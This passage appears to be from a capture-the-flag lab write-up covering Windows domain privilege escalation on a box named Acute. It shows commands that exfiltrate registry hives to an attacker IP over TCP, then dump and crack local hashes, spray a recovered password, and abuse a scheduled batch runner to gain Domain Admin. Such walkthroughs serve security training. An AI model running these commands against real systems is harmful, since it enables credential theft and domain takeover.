PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
Access to the path 'C:\Program Files\keepmeon' is denied.
    + CategoryInfo          : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccess Exception
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
    + PSComputerName        : ATSSERVER

# As the jmorgan
nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
PS C:\Users> function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
PS C:\Users> whoami
acute\jmorgan
PS C:\Users> cd jmorgan/Music
PS C:\Users\jmorgan\Music> reg save hklm\sam sam.save
PS C:\Users\jmorgan\Music> reg save hklm\system system.save
PS C:\Users\jmorgan\Music> reg save hklm\security security.save
PS C:\Users\jmorgan\Music> $server = "10.10.14.123";
PS C:\Users\jmorgan\Music> $port = 4444; $filePath = "C:\users\jmorgan\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
PS C:\Users\jmorgan\Music> $port = 4445; $filePath = "C:\users\jmorgan\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
---
└─$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:d0ffff99f06b17c84500af8e4ddff5ce291eb3432697a1ffb217e83d6b0732d75c897ec8050d4814c90ed10618a30013ddaf0ef1511fc1fcd140f806613365dcaa7ae7d36fb7c97a08dc31e48898048b3ac54c1d9caeb28e3c3ad1b23025a562e63c3b77cc733b281bd30717ee96bd9381d914a5fc6224356341287d4b1673026810e17591458368e4049ddc45fc5e6a03c2d194b31e968dc34862242815a2da2cf55889b40a92bc63ac1737e04576baa127630c488829f33be169aeb0b3d07f5978ee458a21baec91d373df26a45f06ffb929424cef5e8ec95cf31944c59f6ed2f59e32326944fc77cab250ce7f191b
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8cb6777ad4f5aa672d41a1f5c41f9640
[*] DPAPI_SYSTEM
dpapi_machinekey:0x574d0cc939c9f986cba32d1546a7fa28747425e0
dpapi_userkey:0x4a77ea6673a027ecd81e4ca010b1d3f70fe1d9cd
[*] NL$KM
 0000   62 2A 29 8D F9 77 CC DD  EE EB 23 20 B2 E2 AF 59   b*)..w....# ...Y
 0010   0B F6 33 E0 95 5D B0 03  B1 01 85 55 9D 16 64 4D   ..3..].....U..dM
 0020   53 1F 93 7B FB EF 2B F7  6E 76 B1 02 3D 63 CC DF   S..{..+.nv..=c..
 0030   F0 35 6F E3 19 8A 69 C1  2E F6 78 80 45 51 EE 0A   .5o...i...x.EQ..
NL$KM:622a298df977ccddeeeb2320b2e2af590bf633e0955db003b10185559d16644d531f937bfbef2bf76e76b1023d63ccdff0356fe3198a69c12ef678804551ee0a
[*] Cleaning up...

➜ cat .\hashes
a29f7623fd11550def0192de9246f46b
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
24571eab88ac0e2dcef127b8e9ad4740
29ab86c5c4d2aab957763e5c1720486d
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt --format=NT .\hashes
Password@123     (?)

Privilege Escalation (awallace)

Get users on DC

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock {  net user }
Administrator            awallace                 chall
edavies                  Guest                    imonks
jmorgan                  krbtgt                   lhopkins

$cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\lhopkins", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\chall", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }

Only awallace worked.

PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
    Directory: C:\Program Files\keepmeon
Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
-a----        21/12/2021     14:57            128 keepmeon.bat                       ATSSERVER

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/keepmeon.bat' }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
 for /R %%x in (*.bat) do (
 if not "%%x" == "%~0" call "%%x"
)

Script Purpose: The script recursively iterates through all .bat files in the current directory and its subdirectories, executing each one except itself.

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group }
*Domain Admins
...
*Site_Admin
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group site_admin }
Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members

Privilege Escalation (Domain Admins)

Add user to this site_admin group

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Set-Content -Path '/Program Files/keepmeon/letmein.bat' -Value 'net group site_admin awallace /add /domain' }

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/letmein.bat' }
net group site_admin awallace /add /domain

After 5minutes we are added to the group

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net user awallace /domain }
User name                    awallace
Full Name                    Aileen Wallace
Local Group Memberships
Global Group memberships     *Domain Users         *Managers         *Site_Admin

Upgrade to Domain Admins

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group "Domain Admins" awallace /add /domain }

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls /Users -Rec }
...
Directory: C:\Users\Administrator\Desktop
Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
-ar---        20/12/2024     16:51             34 root.txt                           ATSSERVER

Directory: C:\Users\Administrator\Documents
Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
-a----        30/01/2022     18:54            320 Clear-Admins.ps1                   ATSSERVER

Directory: C:\Users\imonks\Desktop
Mode                 LastWriteTime         Length Name                               PSComputerName
----                 -------------         ------ ----                               --------------
-ar---        20/12/2024     16:51             34 user.txt                           ATSSERVER
-a----        20/12/2024     19:34            691 wm.ps1                             ATSSERVER
...

Root.txt

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Desktop/root.txt }
31fc4f59e57da529b2924f4d1dc1ee41

Admin Script

PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat /Users/Administrator/Documents/Clear-Admins.ps1 }
Import-Module ActiveDirectory
Get-ADGroupMember 'site_admin' | ForEach-Object {Remove-ADGroupMember 'site_admin' $_ -Confirm:$false}
Get-ADGroupMember 'Domain Admins' | ForEach-Object {Remove-ADGroupMember 'Domain Admins' $_ -Confirm:$false}
Add-ADGroupMember -Identity 'Domain Admins' -Members Site_admin,Administrator

PreviousCap NextAdministrator

Last updated 8 months ago

hashtagRecon

hashtagHTTPs (443)

hashtagStaff Access (EDavies)

hashtagReverse Shell

hashtagPrivilege Escalation (imonks)

hashtagUser.txt

hashtagPrivilege Escalation (jmorgan)

hashtagPrivilege Escalation (awallace)

hashtagPrivilege Escalation (Domain Admins)

hashtagRoot.txt

hashtagAdmin Script